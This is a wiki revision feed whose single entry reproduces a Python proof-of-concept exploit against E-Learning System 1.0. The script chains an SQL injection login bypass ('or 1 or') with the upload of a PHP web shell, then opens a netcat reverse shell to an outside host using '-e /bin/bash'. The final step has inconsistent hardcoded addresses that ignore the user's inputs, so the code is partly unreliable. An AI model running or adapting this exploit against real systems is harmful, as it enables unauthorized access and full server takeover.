<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=E-Learning_System_1.0_%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E7%B9%9E%E9%81%8E%E6%BC%8F%E6%B4%9E</id>
	<title>E-Learning System 1.0 身份驗證繞過漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=E-Learning_System_1.0_%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E7%B9%9E%E9%81%8E%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=E-Learning_System_1.0_%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E7%B9%9E%E9%81%8E%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-16T10:22:57Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=E-Learning_System_1.0_%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E7%B9%9E%E9%81%8E%E6%BC%8F%E6%B4%9E&amp;diff=1299&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==POC== &lt;pre&gt; # Exploit Title: E-Learning System 1.0 - Authentication Bypass &amp; RCE # Exploit Author: Himanshu Shukla &amp; Saurav Shukla # Date: 2021-01-15 # Vendor Homepage: http...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=E-Learning_System_1.0_%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E7%B9%9E%E9%81%8E%E6%BC%8F%E6%B4%9E&amp;diff=1299&amp;oldid=prev"/>
		<updated>2021-04-09T08:20:15Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==POC== &amp;lt;pre&amp;gt; # Exploit Title: E-Learning System 1.0 - Authentication Bypass &amp;amp; RCE # Exploit Author: Himanshu Shukla &amp;amp; Saurav Shukla # Date: 2021-01-15 # Vendor Homepage: http...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==POC==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit Title: E-Learning System 1.0 - Authentication Bypass &amp;amp; RCE&lt;br /&gt;
# Exploit Author: Himanshu Shukla &amp;amp; Saurav Shukla&lt;br /&gt;
# Date: 2021-01-15&lt;br /&gt;
# Vendor Homepage: https://www.sourcecodester.com/php/12808/e-learning-system-using-phpmysqli.html&lt;br /&gt;
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/caiwl.zip&lt;br /&gt;
# Version: 1.0&lt;br /&gt;
# Tested On: Kali Linux + XAMPP 7.4.4&lt;br /&gt;
# Description: E-Learning System 1.0 - Authentication Bypass Via SQL Injection + Remote Code Execution&lt;br /&gt;
&lt;br /&gt;
#Step 1: run the exploit in python with this command: python3 exploit.py&lt;br /&gt;
#Step 2: Input the URL of the vulnerable application: Example: http://10.10.10.23/caiwl/&lt;br /&gt;
#Step 3: Input your LHOST where you want the reverse shell: Example: 10.9.192.23&lt;br /&gt;
#Step 4: Input your LPORT that is the port where the reverse shell will spawn: Example: 4444&lt;br /&gt;
#Step 5: Start a Netcat Listener on the port specified in Step 4 using this command: nc -lnvp 4444&lt;br /&gt;
#Step 6: Hit enter on the  if your Netcat Listener is ready, and you will get a reverse shell as soon as you hit enter.&lt;br /&gt;
&lt;br /&gt;
import requests&lt;br /&gt;
&lt;br /&gt;
print('########################################################')&lt;br /&gt;
print('##                 E-LEARNING SYSTEM 1.0              ##')&lt;br /&gt;
print('##   AUTHENTICATION BYPASS &amp;amp; REMOTE CODE EXECUTION    ##')&lt;br /&gt;
print('########################################################')&lt;br /&gt;
&lt;br /&gt;
print('Author - Himanshu Shukla &amp;amp; Saurav Shukla')&lt;br /&gt;
&lt;br /&gt;
GREEN =  '\033[32m' # Green Text&lt;br /&gt;
RED =  '\033[31m' # Red Text&lt;br /&gt;
RESET = '\033[m' # reset to the defaults&lt;br /&gt;
#Create a new session&lt;br /&gt;
s = requests.Session() &lt;br /&gt;
  &lt;br /&gt;
#Set Cookie&lt;br /&gt;
cookies = {'PHPSESSID': 'd794ba06fcba883d6e9aaf6e528b0733'}&lt;br /&gt;
&lt;br /&gt;
LINK=input(&amp;quot;Enter URL of The Vulnarable Application : &amp;quot;)&lt;br /&gt;
&lt;br /&gt;
#Authentication Bypass&lt;br /&gt;
print(&amp;quot;[*]Attempting Authentication Bypass...&amp;quot;)&lt;br /&gt;
values = {&amp;quot;user_email&amp;quot;:&amp;quot;'or 1 or'&amp;quot;, &amp;quot;user_pass&amp;quot;:&amp;quot;lol&amp;quot;,&amp;quot;btnLogin&amp;quot;:&amp;quot;&amp;quot;}&lt;br /&gt;
r=s.post(LINK+'admin/login.php', data=values, cookies=cookies) &lt;br /&gt;
&lt;br /&gt;
r=s.post(LINK+'admin/login.php', data=values, cookies=cookies) &lt;br /&gt;
&lt;br /&gt;
#Check if Authentication was bypassed or not.&lt;br /&gt;
logged_in = True if(&amp;quot;You login as Administrator.&amp;quot; in r.text) else False&lt;br /&gt;
l=logged_in&lt;br /&gt;
if l:&lt;br /&gt;
	print(GREEN+&amp;quot;[+]Authentication Bypass Successful!&amp;quot;, RESET)&lt;br /&gt;
else:&lt;br /&gt;
	print(RED+&amp;quot;[-]Failed To Authenticate!&amp;quot;, RESET)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
#Creating a PHP Web Shell&lt;br /&gt;
&lt;br /&gt;
phpshell  = {&lt;br /&gt;
               'file': &lt;br /&gt;
                  (&lt;br /&gt;
                   'shell.php', &lt;br /&gt;
                   '&amp;lt;?php echo shell_exec($_REQUEST[&amp;quot;cmd&amp;quot;]); ?&amp;gt;', &lt;br /&gt;
                   'application/x-php', &lt;br /&gt;
                  {'Content-Disposition': 'form-data'}&lt;br /&gt;
                  ) &lt;br /&gt;
             }&lt;br /&gt;
&lt;br /&gt;
# Defining value for form data&lt;br /&gt;
data = {'LessonChapter':'test', 'LessonTitle':'test','Category':'Docs','save':''}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
#Uploading Reverse Shell&lt;br /&gt;
print(&amp;quot;[*]Uploading PHP Shell For RCE...&amp;quot;)&lt;br /&gt;
upload = s.post(LINK+'/admin/modules/lesson/controller.php?action=add', cookies=cookies, files=phpshell, data=data, verify=False)&lt;br /&gt;
&lt;br /&gt;
shell_upload = True if(&amp;quot;window.location='index.php'&amp;quot; in upload.text) else False&lt;br /&gt;
u=shell_upload&lt;br /&gt;
if u:&lt;br /&gt;
	print(GREEN+&amp;quot;[+]PHP Shell has been uploaded successfully!&amp;quot;, RESET)&lt;br /&gt;
else:&lt;br /&gt;
	print(RED+&amp;quot;[-]Failed To Upload The PHP Shell!&amp;quot;, RESET)&lt;br /&gt;
&lt;br /&gt;
print(&amp;quot;[*]Please Input Reverse Shell Details&amp;quot;)&lt;br /&gt;
LHOST=input(&amp;quot;[*]LHOST : &amp;quot;)&lt;br /&gt;
LPORT=input(&amp;quot;[*]LPORT : &amp;quot;)&lt;br /&gt;
&lt;br /&gt;
print('[*]Start Your Netcat Listener With This Command : nc -lvnp '+LPORT)&lt;br /&gt;
input('[*]Hit Enter if your netcat shell is ready. ')&lt;br /&gt;
print('[+]Deploying The Web Shell...')&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
#Executing The Webshell&lt;br /&gt;
e=s.get('http://192.168.1.5/caiwl/admin/modules/lesson/files/shell.php?cmd=nc 192.168.1.2 9999 -e /bin/bash', cookies=cookies)&lt;br /&gt;
&lt;br /&gt;
exit()&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>